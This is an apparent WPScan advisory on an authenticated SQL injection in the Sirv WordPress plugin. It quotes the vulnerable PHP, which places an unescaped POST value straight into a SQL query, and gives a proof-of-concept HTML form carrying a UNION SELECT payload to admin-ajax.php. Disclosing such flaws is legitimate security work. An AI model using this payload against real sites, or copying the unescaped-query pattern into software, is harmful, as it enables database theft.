Sirv <= 1.3.1 - Authenticated SQL Injection
Sign up to our free email alerts service for instant vulnerability notifications!| Description | $_POST[ ‘id’ ] is not escaped. sirv_get_row_by_id() is accessible for every registered user.
$id = $_POST['row_id'];
$row = $wpdb->get_row("SELECT * FROM $table_name WHERE id = $id", ARRAY_A);
$row['images'] = unserialize($row['images']);
echo json_encode($row); |
| Proof of Concept | <form method="post" action="http://target/wp-admin/admin-ajax.php">
<input type="text" name="row_id" value="0 UNION SELECT 1, name,slug, term_group, 6, 7, 8, 9, 10, 11, 12 FROM wp_terms WHERE term_id=1">
<input type="text" name="action" value="sirv_get_row_by_id">
<input type="submit" value="Send">
</form> |
Affects
| Plugin |
sirv
fixed in version 1.3.2
|
References
| EXPLOITDB | 40772 |
| URL | http://lenonleite.com.br/en/blog/2016/11/10/sirv-1-3-1-plugin-for-wordpress/ |
Classification
| Type | SQLI |
| OWASP Top 10 | A1: Injection |
| CWE | CWE-89 |
Miscellaneous
| Submitter | Lenon Leite |
| Submitter Website | http://lenonleite.com.br/en/blog/2016/11/10/sirv-1-3-1-plugin-for-wordpress/ |
| Submitter Twitter | lenonleite |
| Views | 87 |
| Verified | No |
| WPVDB ID | 8673 |
Timeline
| Publicly Published | 2016-11-10 (9 months ago) |
| Added | 2016-11-21 (9 months ago) |
| Last Updated | 2016-11-21 (9 months ago) |
Copyright & License
| Copyright | All data and resources contained within this page and this web site is Copyright © The WPScan Team. |
| License | Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us. |
